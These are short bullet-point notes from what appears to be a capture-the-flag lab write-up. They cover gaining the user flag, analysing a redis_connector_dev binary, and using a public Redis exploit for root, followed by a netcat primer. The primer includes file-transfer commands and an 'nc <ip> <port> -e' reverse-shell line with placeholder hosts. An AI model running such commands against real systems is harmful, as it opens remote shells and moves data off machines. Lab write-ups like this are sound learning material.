-
Need to get 2 flags(files)
-
User Flag → /home/<user>/user.txt
-
Root Flag → /root/root.txt
-
It was a Private IP Address.
-
So, They provide a OpenVPN profile to connect to their LAN.
USER FLAG
-
Somehow, Able to get user.txt file.
-
After exploiting through the web server.
Privilege Escalation
-
After some enumeration found a file.
-
redis_connector_dev under /usr/local/bin
-
Executed on the machine nothing happens.
Analysis
-
Downloaded the binary to local machine.
-
It was a ELF file. Tried extracting Strings.
-
Executed on sandboxed env. It was trying to send data to port 6379(redis db port).
ROOT FLAG
-
Using nc create a listener on Port 6379. To see the message.
-
Then, Exploited redis db with some public exploit.
-
Finally got the root flag.
Netcat
-
Read and write to the network connection via TCP and UDP.
-
Ex. Sending Message:
-
Server : nc -lvp 80
-
Client : nc <server-ip> <server-port>
More on nc
-
Sending Files
-
Sender: nc <ip> <port> < message.txt
-
Receiver: nc -lvp 80 > received.txt
-
Executing Commands
-
nc -lvp 80
-
nc <ip> <port> -e /file/to/execute
-
This feature was removed to protect from reverse shell.